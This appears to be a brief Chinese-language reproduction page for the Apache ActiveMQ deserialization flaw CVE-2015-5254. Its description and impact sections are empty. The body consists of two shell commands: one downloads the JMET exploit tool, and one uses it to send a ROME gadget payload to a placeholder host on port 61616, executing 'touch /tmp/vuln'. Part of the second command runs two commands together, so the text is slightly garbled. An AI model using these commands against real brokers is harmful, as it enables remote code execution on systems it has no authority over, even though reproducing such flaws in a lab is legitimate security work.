Apache ActiveMQ 反序列化漏洞 CVE-2015-5254
漏洞描述
漏洞影响
漏洞复现
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir externaljava -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/vuln" -Yp ROME xxx.xxx.xxx.xxx 61616
Last updated